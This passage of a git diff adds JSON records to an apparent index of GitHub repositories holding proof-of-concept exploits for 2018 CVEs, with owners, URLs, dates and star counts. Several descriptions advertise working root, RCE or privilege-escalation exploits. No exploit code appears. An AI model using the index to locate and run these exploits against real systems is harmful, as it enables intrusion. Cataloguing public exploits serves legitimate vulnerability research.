"proof-of-concept", + "rce", + "remote-code-execution" + ], + "visibility": "public", + "forks": 3, + "watchers": 2, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 843866201, + "name": "CVE-2018-17431-Comodo", + "full_name": "sanan2004\/CVE-2018-17431-Comodo", + "owner": { + "login": "sanan2004", + "id": 118365296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/118365296?v=4", + "html_url": "https:\/\/github.com\/sanan2004", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sanan2004\/CVE-2018-17431-Comodo", + "description": "Comodo ", + "fork": false, + "created_at": "2024-08-17T16:52:25Z", + "updated_at": "2024-08-22T17:35:57Z", + "pushed_at": "2024-08-22T12:36:08Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-17456.json b/2018/CVE-2018-17456.json new file mode 100644 index 0000000000..0760fe8bc6 --- /dev/null +++ b/2018/CVE-2018-17456.json @@ -0,0 +1,188 @@ +[ + { + "id": 154035813, + "name": "CVE-2018-17456", + "full_name": "shpik-kr\/CVE-2018-17456", + "owner": { + "login": "shpik-kr", + "id": 12602773, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12602773?v=4", + "html_url": "https:\/\/github.com\/shpik-kr", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/shpik-kr\/CVE-2018-17456", + "description": "1-day", + "fork": false, + "created_at": "2018-10-21T17:46:10Z", + "updated_at": "2018-10-23T11:22:27Z", + "pushed_at": "2018-10-23T11:22:26Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 156715728, + "name": "CVE-2018-17456", + "full_name": "matlink\/CVE-2018-17456", + "owner": { + "login": "matlink", + "id": 4450078, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4450078?v=4", + "html_url": "https:\/\/github.com\/matlink", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/matlink\/CVE-2018-17456", + "description": null, + "fork": false, + "created_at": "2018-11-08T14:03:52Z", + "updated_at": "2018-11-08T14:21:16Z", + "pushed_at": "2018-11-08T14:21:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 190417594, + "name": "CVE-2018-17456", + "full_name": "799600966\/CVE-2018-17456", + "owner": { + "login": "799600966", + "id": 33747285, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33747285?v=4", + "html_url": "https:\/\/github.com\/799600966", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/799600966\/CVE-2018-17456", + "description": null, + "fork": false, + "created_at": "2019-06-05T15:10:09Z", + "updated_at": "2019-06-06T01:20:42Z", + "pushed_at": "2019-06-06T01:20:40Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 193022908, + "name": "CVE-2018-17456", + "full_name": "AnonymKing\/CVE-2018-17456", + "owner": { + "login": "AnonymKing", + "id": 26847177, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26847177?v=4", + "html_url": "https:\/\/github.com\/AnonymKing", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AnonymKing\/CVE-2018-17456", + "description": "CVE-2018-17456漏洞复现(PoC+Exp)", + "fork": false, + "created_at": "2019-06-21T03:17:26Z", + "updated_at": "2023-06-26T08:37:13Z", + "pushed_at": "2019-06-22T13:55:36Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 496978854, + "name": "test", + "full_name": "jiahuiLeee\/test", + "owner": { + "login": "jiahuiLeee", + "id": 102200274, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102200274?v=4", + "html_url": "https:\/\/github.com\/jiahuiLeee", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jiahuiLeee\/test", + "description": "CVE-2018-17456复现", + "fork": false, + "created_at": "2022-05-27T11:56:07Z", + "updated_at": "2022-05-27T11:56:07Z", + "pushed_at": "2022-05-31T08:18:01Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 832083285, + "name": "CVE-2018-17456", + "full_name": "KKkai0315\/CVE-2018-17456", + "owner": { + "login": "KKkai0315", + "id": 113790723, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/113790723?v=4", + "html_url": "https:\/\/github.com\/KKkai0315", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/KKkai0315\/CVE-2018-17456", + "description": "a test repository for CVE-2018-17456's PoC", + "fork": false, + "created_at": "2024-07-22T10:15:44Z", + "updated_at": "2024-07-22T10:17:58Z", + "pushed_at": "2024-07-22T10:17:55Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-17463.json b/2018/CVE-2018-17463.json new file mode 100644 index 0000000000..88fad6fa22 --- /dev/null +++ b/2018/CVE-2018-17463.json @@ -0,0 +1,64 @@ +[ + { + "id": 363765446, + "name": "CVE-2018-17463", + "full_name": "kdmarti2\/CVE-2018-17463", + "owner": { + "login": "kdmarti2", + "id": 2709377, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2709377?v=4", + "html_url": "https:\/\/github.com\/kdmarti2", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kdmarti2\/CVE-2018-17463", + "description": "Completed a working exploit for CVE-2018-17463 for fun.", + "fork": false, + "created_at": "2021-05-02T22:44:33Z", + "updated_at": "2023-09-07T10:21:02Z", + "pushed_at": "2021-05-02T22:53:42Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 582842774, + "name": "CVE-2018-17463", + "full_name": "jhalon\/CVE-2018-17463", + "owner": { + "login": "jhalon", + "id": 19541892, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19541892?v=4", + "html_url": "https:\/\/github.com\/jhalon", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jhalon\/CVE-2018-17463", + "description": "Working Proof of Concept Exploit for CVE-2018-17463", + "fork": false, + "created_at": "2022-12-28T02:42:59Z", + "updated_at": "2024-08-23T17:46:34Z", + "pushed_at": "2022-12-28T02:45:52Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 9, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-17552.json b/2018/CVE-2018-17552.json new file mode 100644 index 0000000000..4c30bd6f56 --- /dev/null +++ b/2018/CVE-2018-17552.json @@ -0,0 +1,33 @@ +[ + { + "id": 736363353, + "name": "CVE-2018-17552", + "full_name": "kimstars\/CVE-2018-17552", + "owner": { + "login": "kimstars", + "id": 23279002, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23279002?v=4", + "html_url": "https:\/\/github.com\/kimstars", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kimstars\/CVE-2018-17552", + "description": "POC +report note", + "fork": false, + "created_at": "2023-12-27T17:34:03Z", + "updated_at": "2023-12-27T17:36:19Z", + "pushed_at": "2023-12-27T17:42:44Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-17553.json b/2018/CVE-2018-17553.json new file mode 100644 index 0000000000..37ef5b2482 --- /dev/null +++ b/2018/CVE-2018-17553.json @@ -0,0 +1,33 @@ +[ + { + "id": 488057677, + "name": "CVE-2018-17553", + "full_name": "MidwintersTomb\/CVE-2018-17553", + "owner": { + "login": "MidwintersTomb", + "id": 9948050, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9948050?v=4", + "html_url": "https:\/\/github.com\/MidwintersTomb", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MidwintersTomb\/CVE-2018-17553", + "description": "CVE-2018-17553 PoC", + "fork": false, + "created_at": "2022-05-03T02:43:59Z", + "updated_at": "2022-05-03T02:46:22Z", + "pushed_at": "2022-05-15T23:15:26Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-17873.json b/2018/CVE-2018-17873.json new file mode 100644 index 0000000000..407d70cd46 --- /dev/null +++ b/2018/CVE-2018-17873.json @@ -0,0 +1,33 @@ +[ + { + "id": 247577930, + "name": "CVE-2018-17873", + "full_name": "Luct0r\/CVE-2018-17873", + "owner": { + "login": "Luct0r", + "id": 43627224, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43627224?v=4", + "html_url": "https:\/\/github.com\/Luct0r", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Luct0r\/CVE-2018-17873", + "description": "WiFiRanger 7.0.8rc3 Incorrect Access Control - Privilege Escalation", + "fork": false, + "created_at": "2020-03-16T00:44:28Z", + "updated_at": "2022-03-30T16:57:58Z", + "pushed_at": "2020-03-19T00:30:38Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-17924.json b/2018/CVE-2018-17924.json new file mode 100644 index 0000000000..2420f04223 --- /dev/null +++ b/2018/CVE-2018-17924.json @@ -0,0 +1,33 @@ +[ + { + "id": 716658616, + "name": "CVE-2018-17924-PoC", + "full_name": "g0dd0ghd\/CVE-2018-17924-PoC", + "owner": { + "login": "g0dd0ghd", + "id": 75677317, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75677317?v=4", + "html_url": "https:\/\/github.com\/g0dd0ghd", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/g0dd0ghd\/CVE-2018-17924-PoC", + "description": "My team research about CVE-2018-17924 of Rockwell Automation Micrologix 1400", + "fork": false, + "created_at": "2023-11-09T15:44:45Z", + "updated_at": "2023-11-28T15:23:07Z", + "pushed_at": "2024-02-07T02:58:40Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-17961.json b/2018/CVE-2018-17961.json new file mode 100644 index 0000000000..980254da35 --- /dev/null +++ b/2018/CVE-2018-17961.json @@ -0,0 +1,33 @@ +[ + { + "id": 155720048, + "name": "CVE-2018-17961", + "full_name": "matlink\/CVE-2018-17961", + "owner": { + "login": "matlink", + "id": 4450078, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4450078?v=4", + "html_url": "https:\/\/github.com\/matlink", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/matlink\/CVE-2018-17961", + "description": null, + "fork": false, + "created_at": "2018-11-01T13:33:12Z", + "updated_at": "2019-09-02T09:36:54Z", + "pushed_at": "2018-11-01T13:33:34Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-18026.json b/2018/CVE-2018-18026.json new file mode 100644 index 0000000000..38b22224ad --- /dev/null +++ b/2018/CVE-2018-18026.json @@ -0,0 +1,33 @@ +[ + { + "id": 153657332, + "name": "CVE-2018-18026", + "full_name": "DownWithUp\/CVE-2018-18026", + "owner": { + "login": "DownWithUp", + "id": 16905064, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16905064?v=4", + "html_url": "https:\/\/github.com\/DownWithUp", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/DownWithUp\/CVE-2018-18026", + "description": "PoC Code for CVE-2018-18026 (exploit by stack overflow)", + "fork": false, + "created_at": "2018-10-18T16:51:26Z", + "updated_at": "2023-07-23T22:42:14Z", + "pushed_at": "2018-11-07T04:00:59Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 6, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-18333.json b/2018/CVE-2018-18333.json new file mode 100644 index 0000000000..8332e82f6a --- /dev/null +++ b/2018/CVE-2018-18333.json @@ -0,0 +1,49 @@ +[ + { + "id": 362991810, + "name": "Dr.DLL-CVE-2018-18333", + "full_name": "mrx04programmer\/Dr.DLL-CVE-2018-18333", + "owner": { + "login": "mrx04programmer", + "id": 46001898, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46001898?v=4", + "html_url": "https:\/\/github.com\/mrx04programmer", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mrx04programmer\/Dr.DLL-CVE-2018-18333", + "description": "Versión Dr. DLL (CVE-2018-18333)", + "fork": false, + "created_at": "2021-04-30T01:23:33Z", + "updated_at": "2022-07-04T16:48:11Z", + "pushed_at": "2022-08-28T19:13:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "backdoor", + "cve", + "ddl", + "demo", + "exploits", + "hacking", + "metasploit", + "msfvenom", + "payload", + "pentesting", + "python", + "spanish", + "windows", + "windows-cve", + "windows-vulnerability" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-18368.json b/2018/CVE-2018-18368.json new file mode 100644 index 0000000000..5faaf50d7c --- /dev/null +++ b/2018/CVE-2018-18368.json @@ -0,0 +1,33 @@ +[ + { + "id": 199149777, + "name": "SEPM-EoP", + "full_name": "DimopoulosElias\/SEPM-EoP", + "owner": { + "login": "DimopoulosElias", + "id": 13225847, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13225847?v=4", + "html_url": "https:\/\/github.com\/DimopoulosElias", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/DimopoulosElias\/SEPM-EoP", + "description": "CVE-2018-18368 SEP Manager EoP Exploit", + "fork": false, + "created_at": "2019-07-27T10:22:19Z", + "updated_at": "2024-08-12T19:51:26Z", + "pushed_at": "2019-11-27T16:25:41Z", + "stargazers_count": 17, + "watchers_count": 17, + "has_discussions": false, + "forks_count": 10, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 10, + "watchers": 17, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-18387.json b/2018/CVE-2018-18387.json new file mode 100644 index 0000000000..7cb7e6d3d8 --- /dev/null +++ b/2018/CVE-2018-18387.json @@ -0,0 +1,33 @@ +[ + { + "id": 153663293, + "name": "CVE-2018-18387", + "full_name": "TheeBlind\/CVE-2018-18387", + "owner": { + "login": "TheeBlind", + "id": 26583110, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26583110?v=4", + "html_url": "https:\/\/github.com\/TheeBlind", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TheeBlind\/CVE-2018-18387", + "description": "playSMS < = 1.4.2 - Privilege escalation", + "fork": false, + "created_at": "2018-10-18T17:40:42Z", + "updated_at": "2024-02-24T11:42:09Z", + "pushed_at": "2018-10-26T16:00:05Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 5, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-18500.json b/2018/CVE-2018-18500.json new file mode 100644 index 0000000000..5ca801a3dc --- /dev/null +++ b/2018/CVE-2018-18500.json @@ -0,0 +1,33 @@ +[ + { + "id": 181987935, + "name": "CVE-2018-18500", + "full_name": "sophoslabs\/CVE-2018-18500", + "owner": { + "login": "sophoslabs", + "id": 40878494, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40878494?v=4", + "html_url": "https:\/\/github.com\/sophoslabs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sophoslabs\/CVE-2018-18500", + "description": "PoC for CVE-2018-18500 - Firefox Use-After-Free", + "fork": false, + "created_at": "2019-04-18T00:26:10Z", + "updated_at": "2024-10-15T16:33:12Z", + "pushed_at": "2019-04-18T20:32:46Z", + "stargazers_count": 58, + "watchers_count": 58, + "has_discussions": false, + "forks_count": 17, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 17, + "watchers": 58, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-18649.json b/2018/CVE-2018-18649.json new file mode 100644 index 0000000000..b2f4f8e0a4 --- /dev/null +++ b/2018/CVE-2018-18649.json @@ -0,0 +1,33 @@ +[ + { + "id": 261982321, + "name": "CVE-2018-18649", + "full_name": "Snowming04\/CVE-2018-18649", + "owner": { + "login": "Snowming04", + "id": 47935594, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47935594?v=4", + "html_url": "https:\/\/github.com\/Snowming04", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Snowming04\/CVE-2018-18649", + "description": "CVE-2018-18649 EXP", + "fork": false, + "created_at": "2020-05-07T07:37:34Z", + "updated_at": "2022-12-18T13:33:13Z", + "pushed_at": "2020-05-07T09:58:23Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 4, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-18714.json b/2018/CVE-2018-18714.json new file mode 100644 index 0000000000..30ed55fd18 --- /dev/null +++ b/2018/CVE-2018-18714.json @@ -0,0 +1,39 @@ +[ + { + "id": 155772208, + "name": "CVE-2018-18714", + "full_name": "DownWithUp\/CVE-2018-18714", + "owner": { + "login": "DownWithUp", + "id": 16905064, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16905064?v=4", + "html_url": "https:\/\/github.com\/DownWithUp", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/DownWithUp\/CVE-2018-18714", + "description": "PoC Code for CVE-2018-18714 (exploit by stack overflow)", + "fork": false, + "created_at": "2018-11-01T20:31:50Z", + "updated_at": "2023-07-23T22:42:13Z", + "pushed_at": "2018-11-09T21:08:46Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "drivers", + "exploit", + "exploit-development", + "winapi" + ], + "visibility": "public", + "forks": 0, + "watchers": 6, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-18778.json b/2018/CVE-2018-18778.json new file mode 100644 index 0000000000..44a87f9411 --- /dev/null +++ b/2018/CVE-2018-18778.json @@ -0,0 +1,64 @@ +[ + { + "id": 273680654, + "name": "Mini_httpd-CVE-2018-18778", + "full_name": "cyberharsh\/Mini_httpd-CVE-2018-18778", + "owner": { + "login": "cyberharsh", + "id": 57433814, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57433814?v=4", + "html_url": "https:\/\/github.com\/cyberharsh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cyberharsh\/Mini_httpd-CVE-2018-18778", + "description": null, + "fork": false, + "created_at": "2020-06-20T09:47:56Z", + "updated_at": "2020-06-20T09:57:22Z", + "pushed_at": "2020-06-20T09:57:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 739621837, + "name": "CVE-2018-18778-Scanner", + "full_name": "auk0x01\/CVE-2018-18778-Scanner", + "owner": { + "login": "auk0x01", + "id": 75381620, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75381620?v=4", + "html_url": "https:\/\/github.com\/auk0x01", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/auk0x01\/CVE-2018-18778-Scanner", + "description": "Scan CVE-2018-18778 with Python", + "fork": false, + "created_at": "2024-01-06T03:13:48Z", + "updated_at": "2024-01-07T06:16:08Z", + "pushed_at": "2024-01-06T03:26:52Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-18852.json b/2018/CVE-2018-18852.json new file mode 100644 index 0000000000..5e150b126e --- /dev/null +++ b/2018/CVE-2018-18852.json @@ -0,0 +1,71 @@ +[ + { + "id": 167646347, + "name": "CVE-2018-18852", + "full_name": "hook-s3c\/CVE-2018-18852", + "owner": { + "login": "hook-s3c", + "id": 31825993, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31825993?v=4", + "html_url": "https:\/\/github.com\/hook-s3c", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hook-s3c\/CVE-2018-18852", + "description": "CERIO RCE CVE-2018-18852, authenticated (vendor defaults) web-based RCE as root user.", + "fork": false, + "created_at": "2019-01-26T03:41:24Z", + "updated_at": "2024-08-12T19:45:12Z", + "pushed_at": "2019-01-26T03:49:09Z", + "stargazers_count": 46, + "watchers_count": 46, + "has_discussions": false, + "forks_count": 16, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "0day", + "cerio", + "cve-2018-18852", + "exploit", + "rce", + "router" + ], + "visibility": "public", + "forks": 16, + "watchers": 46, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 197655822, + "name": "CVE-2018-18852", + "full_name": "andripwn\/CVE-2018-18852", + "owner": { + "login": "andripwn", + "id": 52893492, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52893492?v=4", + "html_url": "https:\/\/github.com\/andripwn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/andripwn\/CVE-2018-18852", + "description": "CERIO RCE CVE-2018-18852, authenticated (vendor defaults) web-based RCE as root user.", + "fork": false, + "created_at": "2019-07-18T20:57:59Z", + "updated_at": "2020-12-13T12:57:17Z", + "pushed_at": "2019-07-18T20:58:57Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-18893.json b/2018/CVE-2018-18893.json new file mode 100644 index 0000000000..3163d595fb --- /dev/null +++ b/2018/CVE-2018-18893.json @@ -0,0 +1,33 @@ +[ + { + "id": 602951404, + "name": "CVE-2018-18893", + "full_name": "LycsHub\/CVE-2018-18893", + "owner": { + "login": "LycsHub", + "id": 44913383, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44913383?v=4", + "html_url": "https:\/\/github.com\/LycsHub", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/LycsHub\/CVE-2018-18893", + "description": null, + "fork": false, + "created_at": "2023-02-17T09:48:14Z", + "updated_at": "2023-02-17T09:52:43Z", + "pushed_at": "2023-02-17T09:52:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-18925.json b/2018/CVE-2018-18925.json new file mode 100644 index 0000000000..883f7bca58 --- /dev/null +++ b/2018/CVE-2018-18925.json @@ -0,0 +1,33 @@ +[ + { + "id": 405715025, + "name": "CVE-2018-18925", + "full_name": "j4k0m\/CVE-2018-18925", + "owner": { + "login": "j4k0m", + "id": 48088579, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48088579?v=4", + "html_url": "https:\/\/github.com\/j4k0m", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/j4k0m\/CVE-2018-18925", + "description": "Exploitation of CVE-2018-18925 a Remote Code Execution against the Git self hosted tool: Gogs.", + "fork": false, + "created_at": "2021-09-12T17:57:56Z", + "updated_at": "2023-09-08T03:21:02Z", + "pushed_at": "2021-09-14T20:29:49Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 7, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-18955.json b/2018/CVE-2018-18955.json new file mode 100644 index 0000000000..2e0865ef28 --- /dev/null +++ b/2018/CVE-2018-18955.json @@ -0,0 +1,39 @@ +[ + { + "id": 449732024, + "name": "CVE-2018-18955", + "full_name": "scheatkode\/CVE-2018-18955", + "owner": { + "login": "scheatkode", + "id": 29172448, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29172448?v=4", + "html_url": "https:\/\/github.com\/scheatkode", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/scheatkode\/CVE-2018-18955", + "description": "💀 Linux local root exploit for CVE-2018-18955", + "fork": false, + "created_at": "2022-01-19T14:47:47Z", + "updated_at": "2024-10-19T10:10:39Z", + "pushed_at": "2022-01-20T21:05:38Z", + "stargazers_count": 16, + "watchers_count": 16, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "exploit", + "linux", + "pentest", + "pentesting" + ], + "visibility": "public", + "forks": 3, + "watchers": 16, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-19052.json b/2018/CVE-2018-19052.json new file mode 100644 index 0000000000..418cef91d0 --- /dev/null +++ b/2018/CVE-2018-19052.json @@ -0,0 +1,33 @@ +[ + { + "id": 514251107, + "name": "cve-2018-19052", + "full_name": "iveresk\/cve-2018-19052", + "owner": { + "login": "iveresk", + "id": 28754633, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28754633?v=4", + "html_url": "https:\/\/github.com\/iveresk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/iveresk\/cve-2018-19052", + "description": "PoC for a security: potential path traversal with specific configs, if `mod_dirlisting` were enabled, which is not the default, this would result in listing the contents of the directory above the alias..", + "fork": false, + "created_at": "2022-07-15T11:51:13Z", + "updated_at": "2024-08-07T05:09:44Z", + "pushed_at": "2022-08-17T22:41:01Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-19126.json b/2018/CVE-2018-19126.json new file mode 100644 index 0000000000..91d092e938 --- /dev/null +++ b/2018/CVE-2018-19126.json @@ -0,0 +1,37 @@ 